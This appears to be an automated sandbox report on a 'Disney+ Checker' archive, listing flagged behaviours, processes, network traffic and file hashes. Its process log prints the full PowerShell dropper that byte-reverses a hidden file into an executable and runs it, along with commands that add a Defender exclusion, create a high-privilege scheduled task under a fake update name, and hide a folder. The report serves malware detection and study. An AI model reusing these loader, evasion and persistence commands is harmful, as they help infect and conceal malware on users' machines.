Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: 33 | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
| Token: 33 | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
Processes
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://gofile.io/d/NGsQfm
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff8f8b946f8,0x7ff8f8b94708,0x7ff8f8b94718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2084,3556413123603290212,7090771647900060367,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2092 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2084,3556413123603290212,7090771647900060367,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2208 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2084,3556413123603290212,7090771647900060367,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2780 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,3556413123603290212,7090771647900060367,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3288 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,3556413123603290212,7090771647900060367,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3300 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,3556413123603290212,7090771647900060367,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4628 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2084,3556413123603290212,7090771647900060367,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5144 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2084,3556413123603290212,7090771647900060367,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5144 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,3556413123603290212,7090771647900060367,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5184 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2084,3556413123603290212,7090771647900060367,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5280 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,3556413123603290212,7090771647900060367,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4656 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2084,3556413123603290212,7090771647900060367,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4696 /prefetch:8
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Users\Admin\Downloads\disney+check\Disney+ Checker By PJ v1.1CP\Disney+ Checker By PJ v1.1\Disney+ Checker By PJ v1.1.exe
"C:\Users\Admin\Downloads\disney+check\Disney+ Checker By PJ v1.1CP\Disney+ Checker By PJ v1.1\Disney+ Checker By PJ v1.1.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command Add-Type -AssemblyName System.Windows.Forms Add-Type -AssemblyName Microsoft.VisualBasic [String] $Config_Path = 'C:\Users\Admin\Downloads\disney+check\Disney+ Checker By PJ v1.1CP\Disney+ Checker By PJ v1.1' + '\config\config' [String] $Tool_Path = 'C:\Users\Admin\Downloads\disney+check\Disney+ Checker By PJ v1.1CP\Disney+ Checker By PJ v1.1' + '\config\config\Rev.exe' try { if ([System.IO.File]::Exists($Config_Path + '\A1.exe') -eq $true) { [System.Diagnostics.Process]::Start($Config_Path + '\A1.exe') } [String[]] $PSCommands = @('@shift /0', '@echo off', '@setlocal enableextensions', '@cd /d "%~dp0"', 'config\Config.bat') [System.Diagnostics.Process] $Proc = New-Object System.Diagnostics.Process [System.Diagnostics.ProcessStartInfo] $StartInfo = New-Object System.Diagnostics.ProcessStartInfo $StartInfo.FileName = 'cmd.exe' $StartInfo.RedirectStandardInput = $true $StartInfo.UseShellExecute = $false $StartInfo.WindowStyle = [System.Diagnostics.ProcessWindowStyle]::Hidden $StartInfo.CreateNoWindow = $true $Proc.StartInfo = $StartInfo $Proc.Start() [System.IO.StreamWriter] $SW = $Proc.StandardInput if ($SW.BaseStream.CanWrite -eq $true) { $SW.WriteLine($PSCommands[0]) $SW.WriteLine($PSCommands[1]) $SW.WriteLine($PSCommands[2]) $SW.WriteLine($PSCommands[3]) $SW.WriteLine($PSCommands[4]) } [System.Threading.Thread]::Sleep(3000) if ([System.IO.File]::Exists($Tool_Path) -eq $true) { [Byte[]] $Rev_Bytes = [System.IO.File]::ReadAllBytes($Tool_Path) [Array]::Reverse($Rev_Bytes) [System.IO.FileStream] $FS = [System.IO.File]::Create($Config_Path + '\A1.exe') $FS.Write($Rev_Bytes, 0, $Rev_Bytes.Length) $FS.Close() $FS.Dispose() [System.IO.File]::Delete($Tool_Path) [System.Diagnostics.Process]::Start($Config_Path + '\A1.exe') } } catch { }
C:\Windows\SysWOW64\cmd.exe
"cmd.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell Add-MpPreference -ExclusionPath "C:\Users" -force
C:\Users\Admin\Downloads\disney+check\Disney+ Checker By PJ v1.1CP\Disney+ Checker By PJ v1.1\config\config\A1.exe
"C:\Users\Admin\Downloads\disney+check\Disney+ Checker By PJ v1.1CP\Disney+ Checker By PJ v1.1\config\config\A1.exe"
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /sc minute /mo 1 /tn "Microsoft\BackEndUpdates\HostDriversUpdates" /tr "C:\Users\Admin\AppData\Roaming\BackEndUpdates\FontDriverHost.exe" /RL HIGHEST /f
C:\Windows\SysWOW64\attrib.exe
attrib +h +s C:\Users\Admin\AppData\Roaming\BackEndUpdates
C:\Users\Admin\Downloads\disney+check\Disney+ Checker By PJ v1.1CP\Disney+ Checker By PJ v1.1\config\System\FontDriverHost.exe
FontDriverHost.exe -pZFr2PH3k
C:\Users\Admin\AppData\Roaming\BackEndUpdates\FontDriverHost.exe
C:\Users\Admin\AppData\Roaming\BackEndUpdates\FontDriverHost.exe
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x3c8 0x474
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,3556413123603290212,7090771647900060367,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4988 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,3556413123603290212,7090771647900060367,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4944 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,3556413123603290212,7090771647900060367,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5188 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,3556413123603290212,7090771647900060367,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2968 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://discord.gg/SDqxsud
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff8f8b946f8,0x7ff8f8b94708,0x7ff8f8b94718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,3556413123603290212,7090771647900060367,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5568 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,3556413123603290212,7090771647900060367,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6400 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2084,3556413123603290212,7090771647900060367,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5632 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=2084,3556413123603290212,7090771647900060367,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=5644 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2084,3556413123603290212,7090771647900060367,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3152 /prefetch:2
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x3c8 0x474
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gofile.io | udp |
| FR | 51.38.43.18:443 | gofile.io | tcp |
| US | 8.8.8.8:53 | 96.136.73.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.43.38.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.gofile.io | udp |
| FR | 45.112.123.126:443 | api.gofile.io | tcp |
| US | 8.8.8.8:53 | s.gofile.io | udp |
| FR | 51.75.242.210:443 | s.gofile.io | tcp |
| FR | 51.75.242.210:443 | s.gofile.io | tcp |
| US | 8.8.8.8:53 | 126.123.112.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 210.242.75.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | store4.gofile.io | udp |
| N/A | 224.0.0.251:5353 | udp | |
| FR | 31.14.70.245:443 | store4.gofile.io | tcp |
| FR | 31.14.70.245:443 | store4.gofile.io | tcp |
| US | 8.8.8.8:53 | 245.70.14.31.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | discord.gg | udp |
| US | 162.159.130.234:443 | discord.gg | tcp |
| US | 162.159.130.234:443 | discord.gg | tcp |
| US | 8.8.8.8:53 | discord.com | udp |
| US | 162.159.128.233:443 | discord.com | tcp |
| US | 162.159.128.233:443 | discord.com | tcp |
| US | 8.8.8.8:53 | 234.130.159.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 233.128.159.162.in-addr.arpa | udp |
| N/A | 127.0.0.1:6463 | tcp | |
| US | 8.8.8.8:53 | a.nel.cloudflare.com | udp |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| US | 35.190.80.1:443 | a.nel.cloudflare.com | tcp |
| US | 162.159.130.233:443 | cdn.discordapp.com | tcp |
| US | 162.159.130.233:443 | cdn.discordapp.com | tcp |
| US | 35.190.80.1:443 | a.nel.cloudflare.com | udp |
| US | 8.8.8.8:53 | 1.80.190.35.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 233.130.159.162.in-addr.arpa | udp |
| N/A | 127.0.0.1:6464 | tcp | |
| N/A | 127.0.0.1:6465 | tcp | |
| N/A | 127.0.0.1:6466 | tcp | |
| N/A | 127.0.0.1:6467 | tcp | |
| N/A | 127.0.0.1:6468 | tcp | |
| N/A | 127.0.0.1:6469 | tcp | |
| N/A | 127.0.0.1:6470 | tcp | |
| N/A | 127.0.0.1:6471 | tcp | |
| N/A | 127.0.0.1:6472 | tcp | |
| US | 8.8.8.8:53 | 123.10.44.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 2783c40400a8912a79cfd383da731086 |
| SHA1 | 001a131fe399c30973089e18358818090ca81789 |
| SHA256 | 331fa67da5f67bbb42794c3aeab8f7819f35347460ffb352ccc914e0373a22c5 |
| SHA512 | b7c7d3aa966ad39a86aae02479649d74dcbf29d9cb3a7ff8b9b2354ea60704da55f5c0df803fd0a7191170a8e72fdd5eacfa1a739d7a74e390a7b74bdced1685 |
\??\pipe\LOCAL\crashpad_1220_TVJLXYPCPDKSWXHB
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | ff63763eedb406987ced076e36ec9acf |
| SHA1 | 16365aa97cd1a115412f8ae436d5d4e9be5f7b5d |
| SHA256 | 8f460e8b7a67f0c65b7248961a7c71146c9e7a19772b193972b486dbf05b8e4c |
| SHA512 | ce90336169c8b2de249d4faea2519bf7c3df48ae9d77cdf471dd5dbd8e8542d47d9348080a098074aa63c255890850ee3b80ddb8eef8384919fdca3bb9371d9f |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | f9c06b024528e116770480e331ee4281 |
| SHA1 | 0fd6ef22f890815b79ff12603db1958657ac5e5f |
| SHA256 | 5166814a4190a176c267eaf130aec0891da36cee16d69cf9489ed986cc11623a |
| SHA512 | 0fc08a0e301736229c50ecfb85282bb534ba4480da37915613637a653066ecd0cf36133b82dad9b91480077a6c9ad8278dae96a924bef976228bb4181dfba170 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\000004.dbtmp
| MD5 | 6752a1d65b201c13b62ea44016eb221f |
| SHA1 | 58ecf154d01a62233ed7fb494ace3c3d4ffce08b |
| SHA256 | 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd |
| SHA512 | 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389 |
C:\Users\Admin\Downloads\disney+check.zip
| MD5 | 1e4e92b9a32bf3953261d2c0ae6fc425 |
| SHA1 | fa9955a1297c932731bd9a4802bc3921cc8cfd6a |
| SHA256 | 5e856a122c34ce60fd7d73462e8efa12362e023d3b344bee7f3d81aea2caa520 |
| SHA512 | 89238fde2e45a2d79157b036627afb5469ffba70f9d3529e0b3eab702db911c599cb8a802e8dbcc3b424b61d6a6b4f91c8a0cfb63779fe34a836bf239d607a88 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | fa274e823bc3beae14b6535f5070dc63 |
| SHA1 | 42d1f7a6b95764089d780df52ae74c4557025231 |
| SHA256 | c15ed227972370a8f035edbbcdf2e4d1e8cdef972398813d4814ae6e1dc33884 |
| SHA512 | 15e06a5914a1a3d1111d3ff847c29b118ed777fbb67354ceb08ff411a569763da999b1ae08494e72ee2412a6ddf07dd9dd27ff745138f440deec5c54e0bb6e15 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 610803cba6bab64a812984d5d18c6a91 |
| SHA1 | cbca0fd57cde5ca61639df88f025e708e7d858e3 |
| SHA256 | 9614f62def088c296c898eb69e7d35bd03900863f68755afe6809bf7dc63be3b |
| SHA512 | c64c482fd616d8358a4b84dfdaf7aeb81614cccd5edf4e298fc5b24a698886e3fd8c41a06c2d309fdc92bf66b45037f98df3e5b9c5ab22825c451bc5a13fe04d |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 8018d7643d39a822ee6a5aded30dc524 |
| SHA1 | f4186bc07b6e9d6563b935b9c0dc2fef95a1e157 |
| SHA256 | 9dea3fb91d18c0df588580b188f86cb1d76b582faeb3384d2e242dbcec2d9210 |
| SHA512 | b0ff5098f93f49a184901385366f8cee1f6f00e87393240e8bbf38e539db4f34b07366ec5d3633470427bdef968a29f25ef904302bbf33af86dc6da4c82fe165 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | fed95f1aa2598e4febb790b67eb2e7d2 |
| SHA1 | b4c8978df2019ccd1f67de44a0e6344f89a15dd4 |
| SHA256 | 44b876b942a15e9e510c72d19755ee56de4b1b1b43c6352e44d5753fa3178307 |
| SHA512 | be961ed75785eb1bb33e8d0ab736e97486659b6158b8f2a84c14776ec8dc09f2628fef9d30996e3bf3db3cbac53c83e9aae3a3f3db48f155e01e66ad160bb354 |
memory/1160-115-0x0000000000740000-0x0000000000764000-memory.dmp
memory/1160-116-0x0000000005640000-0x0000000005BE4000-memory.dmp
memory/5140-118-0x00000000052A0000-0x00000000052D6000-memory.dmp
memory/5140-119-0x0000000005990000-0x0000000005FB8000-memory.dmp
memory/5140-120-0x0000000005790000-0x00000000057B2000-memory.dmp
memory/5140-121-0x0000000005FC0000-0x0000000006026000-memory.dmp
memory/5140-122-0x00000000061A0000-0x0000000006206000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_y5mpl1fy.nxh.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/5140-132-0x0000000006220000-0x0000000006574000-memory.dmp
memory/5140-133-0x0000000006860000-0x000000000687E000-memory.dmp
memory/5140-134-0x00000000068A0000-0x00000000068EC000-memory.dmp
memory/5140-135-0x0000000007EE0000-0x000000000855A000-memory.dmp
memory/5140-136-0x0000000006DB0000-0x0000000006DCA000-memory.dmp
memory/5140-137-0x0000000007CB0000-0x0000000007D4C000-memory.dmp
memory/5380-147-0x00000000074D0000-0x0000000007502000-memory.dmp
memory/5380-148-0x0000000070670000-0x00000000706BC000-memory.dmp
memory/5380-158-0x0000000006900000-0x000000000691E000-memory.dmp
memory/5380-159-0x0000000007520000-0x00000000075C3000-memory.dmp
memory/5380-160-0x0000000007700000-0x000000000770A000-memory.dmp
memory/5380-161-0x00000000078F0000-0x0000000007986000-memory.dmp
memory/5380-162-0x0000000007880000-0x0000000007891000-memory.dmp
memory/5380-163-0x00000000078B0000-0x00000000078BE000-memory.dmp
memory/5380-164-0x00000000078C0000-0x00000000078D4000-memory.dmp
memory/5380-165-0x00000000079B0000-0x00000000079CA000-memory.dmp
memory/5380-166-0x00000000079A0000-0x00000000079A8000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
| MD5 | 968cb9309758126772781b83adb8a28f |
| SHA1 | 8da30e71accf186b2ba11da1797cf67f8f78b47c |
| SHA256 | 92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a |
| SHA512 | 4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 4d25dba86d66478e6eb483813961786c |
| SHA1 | 88c65404f62ddd56e72f6c648b44198ed8f236de |
| SHA256 | 27f9346c657abc0b5374a805de64a38d6132ca8cf6e67ae4e95f2cbc3ae7b440 |
| SHA512 | 099a9027813042c72291e486e2e003f6ea16c595feac9f486cec9bdc3cb44b40bc986ec9d26737ac4972667ae55bc09cbcacc210c67364362aa7ed707b9ed11b |
C:\Users\Admin\Downloads\disney+check\Disney+ Checker By PJ v1.1CP\Disney+ Checker By PJ v1.1\config\config\A1.exe
| MD5 | 4fc6c924887c48f5ee586335f8f3c907 |
| SHA1 | e0623cac8e1db04b7270b3ee1eb71053a94d2b77 |
| SHA256 | 7fb7011eb35ffd8eadaf23354ffe128acb13a9d25fbe06f41ba7523b5477b49b |
| SHA512 | 8ca34371975ef8be05b987b733185ad7b0ec586b364875092da63fd63f9b744735ffa92997cb85d033137feb1e98c3d73ca45c2471c5090e2ecf01a8373572e4 |
memory/5588-192-0x0000000070670000-0x00000000706BC000-memory.dmp
memory/5808-191-0x0000000000140000-0x00000000001D2000-memory.dmp
memory/5588-202-0x0000000007440000-0x00000000074E3000-memory.dmp
memory/5808-203-0x0000000004BB0000-0x0000000004C42000-memory.dmp
memory/5808-205-0x0000000004A90000-0x0000000004A9A000-memory.dmp
memory/5808-207-0x0000000005710000-0x0000000005934000-memory.dmp
memory/5808-206-0x0000000004C50000-0x0000000004CA6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\1a5fdae6-8f46-4b8b-a738-d6572f690d43\AgileDotNetRT.dll
| MD5 | 14ff402962ad21b78ae0b4c43cd1f194 |
| SHA1 | f8a510eb26666e875a5bdd1cadad40602763ad72 |
| SHA256 | fb9646cb956945bdc503e69645f6b5316d3826b780d3c36738d6b944e884d15b |
| SHA512 | daa7a08bf3709119a944bce28f6ebdd24e54a22b18cd9f86a87873e958df121a3881dcdd5e162f6b4e543238c7aef20f657c9830df01d4c79290f7c9a4fcc54b |
memory/5808-215-0x0000000073280000-0x0000000073309000-memory.dmp
memory/5588-216-0x0000000005F40000-0x0000000005F51000-memory.dmp
memory/5808-217-0x0000000007200000-0x0000000007214000-memory.dmp
memory/5588-218-0x0000000005F80000-0x0000000005F94000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 7b9fb68daf65d2c67893850a4bf064eb |
| SHA1 | 7a01e5c17d97b66706dd1e43199d725927fee8be |
